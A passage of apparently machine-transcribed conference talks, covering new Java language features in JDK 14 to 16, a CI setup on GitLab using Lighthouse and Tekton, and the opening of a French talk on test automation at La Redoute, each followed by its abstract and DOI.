exception. You can't throw a checked exception because there's no syntax in there in terms defining the compact constructor to say it throws a type of exception. So syntax for that doesn't allow specifying a checked exception. In terms of the standard methods that you have with the object equals hash code and two string, you can override those within a record. So there's no problem with doing that. You can actually override them and everything will work exactly the way that you expect it to. Base class of all records is Java dot lang dot record. So that's a new class that's been introduced and this is also a preview feature. This again comes back to the idea of preview features that allow you to include things without making it part of the standard. This was a specific thing that needed to be done because if we added record as part of the Java standard, the way they did it before was to immediately deprecate it so they could potentially remove it if it needed to be. Now we have them as part of the preview feature so they're not actually part of the standard straight away. Records don't follow the Java being pattern. So that's something that's a slight subtlety in terms of the way this works. So the thing here is that rather than using the bean pattern, which the accessor methods would typically be called getX and getY, they've decided to use the shorter version, which is simply X and Y. So you don't have the get part of that. I personally would prefer to see the bean pattern but it's one of those things where if you ask 100 developers, 50 will go one way, 50 will go the other way. So it doesn't really matter but it's just something to be aware of. Instance fields cannot be added to a record. So you define obviously X and Y in the example we had at the point, low and high in our range. You can't add any more instance variables to that record. There's nowhere of doing that. However, if you want to, you can do that for static fields. So you can add static fields to your record but you can't add an instance field unless it's part of the record itself. And records can be generic. So that's all good. Instance off. So another thing that we got in JDK 14, if we look at the way that we use instance off where we passed an object but we don't know necessarily what type it is exactly, we need to test that in order to determine how we want to use it. This is very simple piece of code, the way that we would typically do that. So we say if obj instance of string and then within the body of the if statement, we say string s equals and then we cast our obj reference to a string because we know that it is an instance of string. So when we do that explicit cast, there's no danger of it getting a class cast exception. So there's no problem there. And then we can print out using the methods of the string to say s.length because now it is a string in terms of our reference and so we can use that without any problem. In terms of pattern matching with instance off, again, it's a preview feature in JDK 14. What we can now do is extend that syntax slightly. So we can say if obj instance of string, but then we'll add a variable to the end of that. So s. If obj instance of string s, at that point, we don't have to do the explicit cast anymore. The compiler is going to effectively do that for us and provide us with a reference that we can then use within that if statement. So here in terms of the true branch of that if statement, we can say system.out.printline s.length because we know that that's true. So it is an instance of string. It's been assigned to s. And so we can use the length method on that and everything will work. However, if we tried to use s in the else branch of the if statement because s, sorry, because obj is not an instance of string, we won't have an assignment to s because it isn't string. So we couldn't use s in that situation. The compiler would reject it as an error. We can do some clever things with that. So we could do something like this. We can say if obj instance of string s and then do an and operator and check to see if the length of that string is greater than zero. If it is, then we'll print out the length of that string. Now, the reason we can do that safely is because in the case of the and operator, the left-hand side is always evaluated first. And only if that evaluates to true will the right-hand side of the operator be evaluated. So here we can safely say if obj instance of string, if that's true, then it is a string. So then we can call the length method on s and that's a safe operation. However, if obj is not a string, that will result in a false evaluation and we will never call the right-hand side so we don't need to worry about trying to call length on something that isn't on a string. Obviously, if we tried to do that with the or operator, that wouldn't work because in the case of the or operator, we have to evaluate both sides of the operator because either side will result in true or if either side results in true, then we go through and do whatever is in the if statement. So in this case, we couldn't do that and we get a compiler error because even if obj wasn't a string, we would still try to call length on s and it wouldn't work. I mean, there are some slightly odd things where you can do that and not necessarily get the results. It may not be clear exactly how things are working. So you could do something like this. You could say if o instance of string s and s.length greater than three, not if it's not that case, then you can return. Otherwise you can print out s.length. So we know that in the case of that if statement, we've evaluated it and we know that s is a string so we can then call length on that and print it out. So that will work even though you might think, oh, hang on. So where's the scope of that s actually going to work? Anything after that is true. Text blocks. Again, these were introduced in JDK13. But now because it was a preview feature, feedback also more development went through and so what they've done here in JDK14 is to add two more escape sequences. Pretty straightforward, pretty simple. One of those is to use the backslash at the end of the line and allow you to continue on without having a new line in the string that's generated. This is very similar if you've done shell programming, then you'll know exactly what this is like. And then also you can have a backslash s which doesn't remove the training spaces. So we'll keep those training spaces in there and they will become part of the string as well. JDK15, so the current, yes, the current release. So JDK15 introduced the idea of sealed classes and this is Jet360. Now in Java, obviously it's an object-oriented programming language and it has the concept of inheritance. So what we can do here is we can say we have a class called shape and we want to inherit from that so we can define triangle, square and pentagon which are subclasses of shape. That's all well and good but what we don't have is any control over which classes can subclass a particular class other than making it final. So if we make a class or an interface final, then we know that nobody can subclass that. So it's a kind of binary thing all or nothing. Either you don't make it final in which case anybody can subclass it, you make it final and nobody can subclass it. What sealed classes allows us to do is to have control over which classes can subclass a given class. And you can think of the final as being the ultimate sealed class as in, you know, it's completely sealed and nobody else can subclass it. See here, although they're called sealed classes, it also applies to interfaces and there's quite complicated logic as to why they use the term class here rather than type. I actually tweeted about this so if you look back on my Twitter feed you'll find there's a link from David Delabasi who replied to my question and it links to an explanation of why it's called sealed classes rather than sealed types. Now in terms of how this works is it introduces two new restricted identifiers. So these are sealed and permits and restricted identifiers are things like var where you can use it without it preventing you from using it as a variable name. So you can still use sealed and permits as variable names, but in certain situations where they're used, then they have, they're used as an identifier rather than, they're used as a keyword rather than identifier. There has one new reserved word which is non-sealed. Now because this has a hyphen in it, this is the first reserved word ever to have a hyphen in it, so there's no backward compatibility issues with that. So you can't use a hyphen in a variable name in Java, doesn't cause a problem. Classes that are using sealed classes must all be in the same package or module. So there has to be that visibility in terms of packaging and modules. So what we can do is we can do something like this, we can say public sealed class shape permits triangle square pentagon and that will allow us to do the same thing that we had before. So we have our shape as a superclass, triangle square pentagon as subclasses. However, what we now can't do, which we could have done before, is to try and have another class called circle inherit from shape. Because if we try and do that, because it's not listed in the permits set of classes, then it will actually fail and you'll get a compiler error. So we're now saying only those three classes, triangle, square and pentagon, can subclass shape, circle cannot. Now once we have a subclass, we then have to have a bit more information because we have to be explicit about the inheritance capabilities of each of those subclasses. Because obviously we've got a sealed class at the top, what does it mean in terms of those subclasses? And there are three separate things that we can do here. So the first is we could restrict the subclasses to a defined set. So we could actually continue that, that ceiling with a permitted set of classes. So we could do public sealed class triangle and then we could say, okay, that permits equilateral and isosceles and extends shape. In terms of another alternative is we could actually prevent any further subclassing. So we could make it final and that effectively seals it completely turns it off. And then the third option we've got, which is where we use that new reserved word, is to say that we can unseal it. So make it non-sealed. So now anybody, any class can inherit from pentagon. So we've said, okay, that in terms of the shape, we're restricting it to, yeah, so non-seal class pentagon extends shape. Second thing here or another thing here is the idea of a second preview of records. So they extended the preview, they haven't made it part of the standard yet, but they've added a little bit more functionality. And the idea here is to say that we can now have local records. So it's like a local class and it's implicitly static. This is quite useful because here's a very good example of how we could use that. So we've got a method, find top sellers. And what we're going to do is we're going to say, okay, we've got a local record called sales, which consists of two things. It's a tuple. It's got seller and it's got sales, which is a double. And then what we're going to do is we're going to use the sellers list that we've got. And then we want to process that. So we're going to use stream with some lambda expressions. And what we first do is we map that seller into the sales. The sales will take the seller that we've got and then calculate the sales that seller had in a particular month and make that the other part of the tuple. Then we can sort that based on the sales of each of those sellers. And then we can map it back to the sellers and collect it in a list. And what that will do is because it's sorted, we can see the ordering of the sellers based on how much they've sold in a given month. And by doing that with a local record, it actually eliminates a whole lot of code that we would have to do otherwise. It makes it much more concise and much more subtle. Finally, just briefly talk about JDK 16 because this is coming out later this month. And not really that much in here. Records is now a feature of Java RSI. So it's no longer a preview feature. It's now a full feature. One minor modification where they've clarified things. So inner classes can now define both implicit and explicit static members. And the impact of that is it allows an inner class to declare a member that is a record class. So that will work. Pattern matching instance of is now a feature of Java RSI. So there are no changes needed from that. It's now be moved from preview feature to full feature. Seal classes have been moved into a second preview. And so now there's a little tiny sort of thing about the standardization. We now have what are called contextual keywords rather than restricted modifiers and keywords. But since I'm running out of time, you'll have to look that one up. Just summarized then, basically, we are moving Java forward faster. I think six month release cycle is working really well. Getting lots of new little language features, tidying up things, simplifying a lot of syntax. Really good stuff. Preview features, incubator modules working really well in terms of allowing those features to be developed in the open so people can provide feedback. Lots more to come. There's lots more things in AMBA. We've also got bigger projects like Valhalla inline types. We've got Lume with virtual threads and so on. And I think it's fair to say that Java is developing continuing to deliver features that developers want and need. If you're looking for a build of OpenJDK, either free or with commercial support, then please go to our website here at zool.com. And like I say, there are free downloads to be had. And with that, thank you very much.
Java is changing faster than ever with new features being added every six months. Despite being over 25 years old, Java is still adapting to ensure it remains one of the most popular platforms on the planet. Find out in this session how to take advantage of many of these exciting new features. With the release of JDK 16, we will have had eight (yes eight!) versions of Java in less than four years. We still hear claims that Java is the new COBOL, and its popularity is in decline. The reality, however, is that Java developers are now being provided with new features at a faster pace than at any time in its 25-year history. Many of these new features provide exciting new language level changes, as well as useful new APIs. In this session, we’ll explore in detail what these changes are and how best to use them (as well as advice on when not to use them). We’ll also explain the significance of preview features and incubator modules.
10.5446/52808 (DOI)
Hi, Fostem. In this video, I would like to show you how to do CI on GitLab. Maybe not necessarily using the GitLab tools, but using cooler tools like Tecton or Pro. So my name is Rafa Manhard. I work as a consultant in IT, mainly in Kubernetes and Clouds. I went by bicycle to Monte Carlo last year and did a mountaineering certification, which was pretty rough and I'm very proud of. Last year, I joined a new team and my first task was to make a proof-of-concept for a cool, very sophisticated CI system. They asked what technologies we are using already and they said GitLab. Of course, GitLab has its own CI system and probably some of you know the.GitLab-CI emails that you have to include in every repo. But I wanted to use something new. The first thing I did, I was looking for cool CI solutions and most of them had CI bots. I made a list of all of the bots. There's a lot of them and probably I haven't found all of them. After days of trying the bots out and making evaluations, I found out that Pro is that bot that I would like to use in the future. What is Pro? Pro is coming from the Kubernetes GitLab project and is used on GitHub. And Pro is a chatbot that allows the user to interact with merge requests. So whenever I push something into the repo, the bots ask me to assign someone to a pull request and there's a whole structure how a pull request should be handled. So let's take a look and let's see how Pro looks like on Kubernetes project on GitHub. How to find Pro? Just Google for Kubernetes. GitHub. You can go to the official repository of Kubernetes. Just on the top, you can see there's a pull request and it was issued by a chatbot called Ked SCI Robot. That's Pro. So when you go to all the pull requests, you can see labels and let's just pick some pull request. And you can see the first comment to the pull request was issued by the CI robot. Some nice instructions, you have to assign someone. You can see the labels assigned to the pull request. That's Pro behind. Let's take a look at another pull request. Oh, yeah. Oh, and that's super nice. Here you can see that Pro ran some tests. So with this instruction, you can rerun the test, see the results of the tests. And all of this is made by the CI bot. You can see it has proof for that CI bot is called Pro. I was super happy with Pro and I was excited that they're going to use it in the future on GitLab. And I even found this map how to interact with push requests, who has to approve push requests and which parts of Pro interact with the users. And then I was looking how to use Pro on GitLab. It was not possible. I even asked the maintainers of Pro if there is a roadmap for using Pro on GitLab. And of course, they said they're looking for contributors. So if any of you want to bring Pro on GitLab, feel free to join them. Well, then I thought there's no way. I cannot use any Pro. I came back to the list of my bots and continued to search for an other alternative. But then I stumbled over Lighthouse. So what is Lighthouse? Lighthouse is also a chatbot, but it's coming from Jenkins X. Jenkins X managed to use Pro with his own solutions. And the solution is called Lighthouse. It doesn't have even a logo. And how Lighthouse works, it consists of few pods that managed incoming webhooks. For instance, Lighthouse webhooks pod, it converts the incoming webhooks from the Git provider and transfers them into Lighthouse jobs. You have a tecton controller which watches over the Lighthouse jobs and translates them into tecton pipelines. You have Focorn. And Focorn is blocking your Git provider from doing the next steps and is somehow, I would say, emulating the pipeline in your Git provider. So you see a job which is still running and you cannot proceed further. For instance, you cannot merge. There is Lighthouse Keeper. Lighthouse Keeper just watches in the chat of the pull request and is waiting for the approve label. You can specify which label it should be, but by default, it's the approve label. And of course, you have one component which is called GEC jobs and is a garbage collector for pipeline grants. So that's Lighthouse. How Lighthouse looks like, we're going to see now in the hands-on. Okay. Okay. Let's take a look at Lighthouse pods. We see a lot of pods running here. And those are the mentioned components. So you can see the webhooks, pod, the tecton controller, Keeper and the Focorn. So let's look at the logs of all of them. I'm just going to skip the logs higher. So we're going to see the fresh logs coming in. One for incoming webhooks and one for the tecton controller, which triggers the pipelines. Okay. You can already see there are some logs coming in, in one of the pods. Let's switch back. Okay. You can see in the same namespace, you can find two config maps, config and plugins. And those are specified here in the installation folder of Lighthouse. So what's inside? The config is basically the config of Lighthouse. And you have to name the verbosity or the repos you are using. And the plugins, you have to, you can configure all the plugins you are using. And you can specify which plugins are used in which repo. So for instance, if you're using repo demo three, you have to say, you want to use the plugin, for instance, labor. So for each repo, you have to specify the plugins. How to set up Lighthouse. You have to go to GitHub, there are repository. And you can see one of the webhooks is pointing on Lighthouse, on the Lighthouse hook. So whatever happens in the repository is being sent to Lighthouse. Okay. So let's see how it works. We're going to open a merge request. We're going to pick one test branch, which is a little bit different than the master branch. And we're going to open the merge request. We're going to do everything default. And now we're going to open the logs. So you can see that the webhook is going to arrive in Lighthouse. And you can see the bots are logging. And here you can see the Lighthouse bot. I called him bottom is already commenting. He's welcoming me. He's labeling the public request or merge request and also saying how to assign users. So for instance, I'm going to be assigned by myself. As you can see, there's a prefix LH, which stands for Lighthouse. And as you can see, I assigned myself the comment and then the bot Lighthouse here assigned me to the merge request. You can do other stuff. You can even use LH bark. And you're going to get some funny photos here. This one of the plugins is posting a picture of a dog. And there you go. And in the next step, you can specify pipelines, which are going to be run by the bot. But oh, and you can see here, the fochorn, the component of Lighthouse is running a pipeline. And this pipeline runs as long. There is no approved label on the public request. So if there's no one puts the approved label, the pipeline is going to be run by fochorn. And then you cannot merge to the master branch. Okay. So far, so good. We have a chatbot which works really nicely with GitLab. It's kind of pro but called Lighthouse. Yeah, but I haven't showed you the pipelines. Why? Because it's a lot of difficulties to get the pipelines running. I was communicating one of the maintainers of Lighthouse, which is Jason. And Jason said Lighthouse works really nicely but with Jenkins X. And I was not using Jenkins X. I just wanted to use Tecton. And it was not working. So after a few days of debugging, I found out that the hand chart that I was using to install Lighthouse and the Tecton pipelines was not right. There was some bug and the bug was fixed and afterwards the pipelines were working. And I also found out that the payload which is sent to the webhooks, to the pod webhooks, is not transmitted to the pipelines. So the pipelines doesn't know which reputable clone to use. It's a huge downside of Lighthouse. And I need to set up each pipeline for each repo. And I didn't want it to do that. One more downside of Lighthouse is that you have these two config maps, config and plugins, YAMLs, that you need to configure to use a specific rep or whatever you add and a new repository. So you need to set up a config, YAML and plugins. That's not very agile in my opinion. Anyhow, besides these pipelines difficulties, I had a really nice working chat bot which acts like a row. It uses all the same plugins. And yeah, it was pretty straightforward to install it with a hand chart. So I have a chat bot, I have no pipelines. So I went on and I was looking like what if there are some nice CI pipeline systems and I went through a few of them. And I saw that Lighthouse often use with Tecton. So I tried to use Tecton with Lighthouse but not the way it's intended to use. So I really wanted to get Jason payload from the webhooks into Tecton. So Tecton was the engine for the pipelines again. So why Tecton is so cool? Because it has a serverless execution. Of course there's a controller bot but the execution is serverless. It has an IS API. Containers are the building blocks and you have reusable components. So you have tasks, pipelines, pipelines, resources. All of this you can find in a Tecton hub or you can specify your own components and use them in many biplans. Tecton is supported by a few big companies who will go out and think OpenShift is using Tecton. That's why Redhead and IBM. And let's take a look at Tecton. First let's install Tecton on our cluster. We're running the cluster in GCP and I'm using a few YAML files inside Tecton. First we install the Tecton pipelines. You can see it's a few customer resources, config maps, all but you can find it on the Tecton GitHub repo. And you can already see we have two pods. One is the controller for the pipelines and the other is the webhook for the pipelines. Okay, we go on. We're just going to install the dashboard so we can see something what pipelines look like. That's also from the Git repository of Tecton and there's a pod of the dashboard. Okay. And we need to install the ingress. We need to ingress so we can see the dashboard on our cluster. So that's all. Now we install Tecton. Okay, nice. Now we installed Tecton. But how does it work? So Tecton consists of a few customer resources and the basic building block is a task. It consists of many steps and each step is a container and a step can do stuff like create a deer in a repository, a clone repository. Very simple task. The task is bundled in a pipeline. It can be triggered by a pipeline run. So whenever I deploy a pipeline run, the pipeline is triggered and the pipeline triggers the task in a specific order. You can define the order which task should be triggered after which task. So let's have a look. Since we already installed Tecton, let's have a look how it looks like. Okay. A very simple demo. We have a task which is only doing echo and it will show the message. And we have a task run which triggers the task to run. Let's take a look how it looks like. We have our three Tecton pods. We take a look here to watch the task runs. And we're going to apply those two resources. First, let's deploy the task. So we have a task in the cluster waiting for the task run to trigger the task. And now we're going to deploy it. Let's take a look here. And we see the task run. It's impending. We are using a new pod which is starting. And it took 11 seconds. Let's take a look at the logs. Hello, CUNP dudes. You are successful. You can see it here. That's how the basic building blocks of Tecton works. Task is triggered by task run. Okay. Let's continue. We saw a task in the task run. Let's take a look at some one step further which is a pipeline and a pipeline run. So in the task demo, we have a few tasks. Two of them. We have a pipeline that is referencing those two tasks. And we have a pipeline run which triggers the pipeline. So similarly as before, let's take a look. Task runs, pipeline runs, now none. We have still our three pods. So let's go on and let's deploy all the resources that we need. Once we are going to deploy the tasks. This one, you have these two tasks. Okay. In the cluster. Let's continue the pipeline which is referencing the tasks. Yup. Pipeline in the cluster. And now the last one is going to trigger pipeline run and task runs. As you can see. We have a task run and pipeline run. We have two new pods. One is completed. The next one is starting. You can see it consists of two containers. Yeah. And let's take a look at the logs. Maybe let's take a simple one. Hello. You see the message. Let's take a look at the other one. Yeah. It shows us the information about the pipeline. It's the parameters that you get from the higher resources into the pipeline. And everything was successful. So that's how it is. Very simple. Tecton pipelines. Very cool feature of Tecton pipeline resources. Piping resources allow you to predefine resources that you very often use in pipelines. I'm using the most the Git resource and image resource. I can define from which repository to clone a repository down or where to push it, where to push the image that was built during the CI. There are many more resources. You have a pool request resource. You have storage resource, a cluster resource, and clothe event resource. And there are many more coming. We have our pipelines. So let's set up our repository and create a web hook to trigger our pipelines. So in GitLab, we just go to web hooks. We create a web hook which is reacting on push events. That's the only thing you need to do to trigger pipelines from GitLab. Now we have the web hook installed in GitLab. It's going to trigger our pipeline. We have a web hook pointing onto our ingress, but there's nothing behind. So that's why we have to use Tecton triggers. It's another part of Tecton. You can find in the same repository on Git. And Tecton triggers is the building block between the pipelines and our Git provider. First, let's install it. Okay. Let's go back to our cluster. And there we go. We have a YAML which installs the triggers. You can get it from the Git repository of Tecton triggers. Nope, typo. Just let's apply. Oh, I guess there's typo. One more time. Okay. Let's install the triggers. Here you can find in the Git repository where Tecton is. It's the other part of Tecton. Okay. Let's apply the YAML. Wow, it's a long one. And you can see the pods. We are getting two new pods. The triggers controller and the triggers web hook. Our Git web hook is going to point onto the web hook pod of triggers. Okay. We installed another thing, another part of Tecton, the Tecton triggers. But what is Tecton triggers exactly? Let's have a look. Tecton triggers, it's the connecting block between the web hook and the pipeline. You can see here, your Git provider, here's GitHub, but we are using GitLab, is sending a web hook. The web hook is being received by the event listener. The event listener can decide, depending on the payload of the web hook, where to send it to which trigger binding. The trigger binding is sending it to the trigger template. The trigger template has a pipeline run, which triggers a pipeline, and the pipeline triggers the tasks. May sound very complex, but it makes everything much more granular, and you can exchange all the building blocks, and it works really fine. So let's have a look. Let's have a hands-on. Let's go back to our environment, and here you can see the listener, and it's listening to event type push hook, whatever we push something to our GitLab provider. It's going to send a push web hook. That's how the web hook looks like. It's a JSON. It has a lot of information about our Git repository. It says it's a push hook. The listener is going to only let the push hooks through, and let's deploy the whole thing. The listener, the trigger bindings, the triggers, and let's see. We're going to look at the locks of the event listener. Let's put enter, so we're going to see the new locks coming. We'll try to use a curl, and we're going to send with a curl the JSON payload to our ingress and to our event listener, and we will try to trigger the pipeline by this curl. And you can see something arrived at our event listener. We have a new pod, a new pipeline run, and a new task run. And everything was successful. Let's take a look. We're completed pod, and you can see here the pod consists of two containers. That means a task consists of two steps. Let's pick one of them. Let's for instance look at our step run, which is showing us whatever is into the repository, and you can see that's our repository. Those are the files from our repository. That's a simple example of how triggers work. You can see how triggers work. Let's take a look on the sequence, how the JSON payload arrives in a container. You can see here with a red arrow, it's a straight line, but to get from a payload to the task, you need to go over a trigger binding. The trigger binding takes the payload over the value to the trigger template. The trigger template takes the value to the pipeline definition. And the pipeline definition puts the value into the task. The task is a pod with a few steps, one of the steps of the container, and to get information there. For instance, you want to clone a Git repository in the task, and you need to know the name and the commit ID of the Git repository. And that's how the information is going from the payload into the task. And actually, this is the ingredient that we are missing in Lighthouse. That's why you couldn't use Lighthouse, because in Lighthouse, when using Tec-Ton pipelines and not using Jenkins X, you cannot get the information from the JSON body into the task. But with Tec-Ton triggers and Tec-Ton, we can trigger pipelines from our Git provider, regardless of the Git provider. It can be GitHub, GitLab, and others. And we can use it next to Pro and Lighthouse. Okay. So we have a chat pod. We have really cool Tec-Ton pipelines. It looks like we have everything, but there's something missing. We are missing a little bit magic. And what is the magic? Magic is Kevin. Who is Kevin? Kevin is one of the Tec-Ton lead contributors. And Kevin helped me a lot, because I was missing one thing in my pipelines and my CI. I couldn't see the pipelines running in GitLab. So I was pushing something into GitLab. And I couldn't see in the GUI any information about the pipeline. I didn't know if the pipeline was successful or not. I only saw the task runs and pipeline runs, which were saying they are successful or they failed, but I haven't seen it in the GUI. So I was researching, and Kevin helped me a lot. In Tec-Ton, in the Git repository of Tec-Ton, you have one part which is called experimental. And there Kevin showed me a very cool thing, which is the commit status tracker. What is the commit status tracker? It's another controller. Basically, it's just a Docker container running. And it watches pipeline runs, and then it goes to annotations, and it looks at the annotations. You have to have specific annotations, like a Git status, status context, status description. And depending on your annotations, the commit status tracker is going to report back to GitHub or GitLab, and it's going to show you a pipeline running in your Git provider. And as long as the pipeline is not green, you cannot merge your pull request, for instance. It was the missing block to have a really cool CI system. Yeah, let's install it. We back again to our environment. Before we go into the commit status tracker, as you can see, we have already a few ports running. So there is our YAML. And here you can see the commit status tracker Docker image. And it's very simple. Let's apply all of this. And you can see the four seconds our commit status tracker is running. And let's try some example. I'm going to deploy something with specific annotations. And the commit status tracker is going to look on pipeline runs with those annotations. You can see there's a status context, even a website that you can refer. That means when I'm on the pipeline, I'm going to click on the pipeline in GitLab, and I'm going to land on this page. And here you can see a pipeline resource, Git, that needs two things, revision, and the link to the repository. Let's have a look. Okay, in our GitLab, under pipelines, there's nothing. It's clean. Let's switch now to our tests. We can apply. We have a task pipeline and pipeline run. Let's apply the whole deal. And we couldn't get the pipeline. Oh, yeah. That's because we deployed the pipeline run before the pipeline was deployed. Is it one more time? Now, step by step, we delete the pipeline run. We apply the task. Okay, task is in the cluster. Then we go with the pipeline. So, we can cluster now, we can trigger the pipeline run. Oops, one more time task. Let's go with pipeline run. Okay, we are triggering the pipeline run. It's pending. Oh, it's already success. We have a new pot. We have results. And let's look at our Git repository. And we have a pipeline which is already green because the pipeline passed is green. And that's because of our commit to the structure. Nice. We have all the building blocks. I think we have done now with hands-on. And you can see now, we have an emerging bot, or chat bot, which is Pro using Jenkins X Lighthouse. We have a tecton for running our pipelines. And we have a little bit of Kevin magic. The commit structure to report the results of the pipeline's back to our Git provider. Git provider. Let's have a look. There's this diagram which is comparing Pro and tecton. So in Pro, you have a plugin called hook, which is waiting for the web hooks. In tecton, we have tecton triggers with interceptors, even listeners, as we saw before. For job execution in Pro, you have a plank. But in tecton, you have pipelines. Tecton pipelines. In Pro, you have a dashboard, deck. It's missing in Lighthouse because Lighthouse is not having all the plugins of Pro. But we can use our tecton dashboard that we installed in our hands-on. In Pro, we have tight for merging in tecton. There is no tight. There is no bot. What we are using Lighthouse, which is Pro. And that's how we are having a nice merging bot. I think the nicest available. For the big jobs, I haven't seen this, but for this, we can use triggers and Kubernetes Chrome jobs. Trigger can trigger a task, which have a Chrome job and a periodic job. And for garbage collection, where we don't have anything for garbage collection, but for this, you can use a simple Chrome job. You don't need to use anything technology. Okay. So I believe that with these three steps, we managed to build up a really nice CI system on top of GitLab. We are not using GitLab as an app of all the apps. We want to use GitLab as a Git repository, not as an engine for running pipelines. With GitLab, we could use GitPocket or GitHub, as long as we are using Lighthouse, tecton, and our small magic step. We believe in the future, tecton is going to manage to create some better technologies and to report the status of the pipelines back to the Git provider. So in the future, we are not going to need any commit status tracker. So then we just rely on our merging bot and our pipeline engine. And in the far future, when you follow the select channel of tecton and how things go, maybe we're not going to need a merging bot. We can do, maybe in the future, we're going to have only tecton. And tecton is going to do the role of a chatbot. You could do it right now, you could use the pipeline resource called puller request. And the pipeline resource could be modified depending on the comments in the chat. There's something more. There are a lot of them. The whole tecton environment is much, much bigger. We have cell interceptors so we can modify the JSON body incoming to the webhooks. We have conditions. We have a lot of experimental features like our commit status tracker. There are more. And I saw there's even a tecton result server which is going to keep our results of our pipeline guns. And even so, someone is working on a notifier. There's also a tecton controller which keeps our tecton running but unfortunately it only works with old tecton versions. I guess the tecton people need more support. And there's a tecton hub. And from the tecton hub you can get tasks and tecton pipelines and you can even contribute there. Okay, that's how our tecton setup on GitLab is working. I believe it's a much nicer setup of GitLab than using this GitLab CI. Yeah, that's it. Thank yougem for the time. The famine of death You are you there? Perfect. Okay, I'm live. And I can hear myself. So who's that the speaker of those not here yet. He might join in a second, maybe a month or it or young you could ping in. And then we'll get to the questions. I'll start with first question. I believe. For some reason, the question is, I'm a pollinger. I asked that he's not sure if he if he missed the pardon beginning but why Rafa is using an external CI solution and not the Github CI. I think the explanation Rafa gave in the end that the goal was basically to use the Github CI to the bear tool that the CI runner so to say. Rafa, there you are. I was in the wrong room. Yeah, why are we using the other technologies not get that CI. First of all, I wanted to use pro and there was no solution for problem get lab. That's why I went with light house and then from light house I came to tecton. The other reason was, I didn't want to be locked in and get lab. So I want to be able to easily switch to get help order. There were also other reasons I was working before with get lab and we use get laps. He eyes a lot. And it was not scaling nicely because then you had the include of a pipeline which was including another pipeline at the end. No one knew where one pipeline was in. Yeah. Also from my experience, it was not scaling well enough. So sometimes pipeline were not starting and there were some issues. And with tecton I have all the pipelines represented as Kubernetes object. I mean, you just look on your Kubernetes cluster and there's your pipeline. You don't have to go into your repository. So that were the main reasons and my private reason was.
Many organizations are using Gitlab as a code repository and wondering too late how to establish CI pipelines. ChatOps, automatic merging, cloud-native, webhook event triggers, serverless, job reusability, scalability, bot-users, simplicity are often on the wishlist. In this showcase we will fulfill the above wishlist with open source tools, speak about the issues that we overcame and demonstrate how to use Gitlab as a pure code repository.
10.5446/52809 (DOI)
Bonjour, bienvenue à la conférence 1er décembre 2021. Je suis très heureux d'être ici avec vous. Nous sommes dans un set-up réunis, j'espère que le son et la présentation seront bien pour vous. Je suis ici aujourd'hui pour parler de deux soucis, deux histoires en fait. L'un de nous comment nous avons réussi à écrire un test automatique dans un contexte enterprise, qui est la Roudoud et qui explique que le company est en train de parler de ce sujet. Et puis, pour parler aussi de la source d'open, parce que nous avons développé le tool durant cette journée. Et donc, c'est ce que nous allons partager, je vais aussi partager cette seconde histoire, c'est de comment nous avons construit ce tool et pourquoi c'est une source d'open et ce que c'est, etc. Alors, nous allons commencer par ces deux soucis. Avant de ceci, je vais juste présenter ma saison, je suis très passionné par la technologie architecturale et tout le regard des transformations entreprenant, et en faisant des choses plus meilleures. En fait, en faisant de développer un nouveau projet et en délivrer les choses. Je suis involved et j'ai un intérêt personnel en qualité, parce que je suis convaincu que ceci peut nous aider beaucoup et produire un meilleur produit, en fait, pour nos compagnies. Je suis aussi involved dans les communautés technologiques, donc je dirais, Meetup, blogs, projet d'open source, parce que je suis convaincu que nous pouvons apprendre plus vite par la sélection et le monde est déjà évolué plus vite, en fait, et nous continuons encore à accélérer. Et je suis vraiment convaincu par ceci, par le connecteur et la formation d'autres, et je peux tous être plus vite. Personnellement, je suis convaincu dans le test de Cerberus, donc je suis le premier de la carte, maintenant le projet d'open source est présent aujourd'hui. Si vous voulez en savoir, il y a LinkedIn et Twitter, ils sont à l'aise, et je vous remercie, et je serai très heureux de vous partager. Nous allons commencer avec la première part, la histoire de laurodoute. Certains ne savent pas, donc laurodoute est une compagnie de fashion retail, elle a plus que 180 ans d'existence, et ce que vous voyez sur cette pièce c'est comment les gens habituellement se remontent de laurodoute, c'était comme un catalogue printé au business. En fait, c'était un procureur dans la saline, en fermant les familles. Nous sommes habitués à voir ce logo en capital, en dessous du tricot, vous pouvez le voir en gris. C'était un modèle au business, principalement construit autour de la fréquence des catalogues de six mois. Ce sera intéressant pour ce qu'il y a après. Vous avez ici une collection sur le haut-right de la collection de différents types qui ont été créés. Maintenant, laurodoute a changé en termes de segmentation et de communication, c'est sous la focus du plateforme préféré, familial et lifestyle. Je vais partager quelques images de ce que cela veut dire, dans les autres pages et images. Nous avons aussi fait une grande transformation digitale, pour pouvoir interrompre avec notre customaire en différentes, standards, sur les web, apps, etc. mais aussi essayer de copier avec l'évolution de l'augmentation de la réalité et aussi le landscape de la méthodologie mobile. Nous vendons une fermeture et nous sommes particulièrement en train de faire des compétitions. Nous produisons, internavant, notre produit de la main-d'oeuvre. Nous avons des designers, etc., qui sont partie de notre compagnie, en addition à la people qui travaillent sur le site et l'arrière digitale, et qui sont complémentées par les gens qui font des services et qui reprennent et font les services customaires. Nous avons aussi, en dernier année, de la transformation, nous avons aussi développé les items de la maison et les furniture. Ce que vous pouvez voir ici est la création interne sur des brandes, comme l'AMPM. Vous pouvez acheter tout ce qu'il y a sur cette image, pour créer un style et décor. Ici, c'est un autre style, mais en même manière, la brandes de la Roudoute. Nous avons aussi développé des nouvelles businesses et de brandes, comme la Roudoute pour le business, qui sont utilisées pour vendre seulement le B2C. Nous avons développé un modèle spécifique, comme celui-ci, pour la Roudoute pour le business. Ici, c'est le type de brandes que nous avons, et nous avons aussi ré-opéré les shops, parce que nous n'avons pas de shops depuis longtemps, quand nous avons accéléré sur la transformation digitale. Et maintenant, nous sommes aussi présentés dans des corners, dans un grand mall commercial. Ceci est ce que vous pouvez voir sur le top-right. Je peux partager quelques figures, maintenant, sur les entreprises. C'est une entreprise de 750 millions d'euros, qui est principalement actuelle en Europe, si nous avons des activités globales et de l'économie mondiale. La grande spécificité, comme je vous l'ai dit, est que 73 % est le design interne. La société a été créée en France depuis longtemps, donc c'est pourquoi ça a beaucoup de nôtres en France. Ce n'est pas le cas aujourd'hui dans les autres pays. C'est un site avec de la haute trafique, et c'est important de partager ce que nous allons faire en fin de tour. En termes de stakes, c'est sur le site web et toutes les expériences digitales. Vous pouvez voir, donc, 7 millions de visiteurs uniques par mois. Nous avons aussi une grande transformation qui a été créée en interactant avec les clients sur les canaux digitaux. Maintenant, plus de 90 % de l'interaction sont faites sur les canaux digitaux. Nous avons un steady increase de l'application mobile. Dans notre transformation, nous avons aussi implémenté l'une des plus automatiques de l'Europe. Ce serait intéressant de partager, parce que nous devions aussi changer la façon dont nous étions testés. Nous 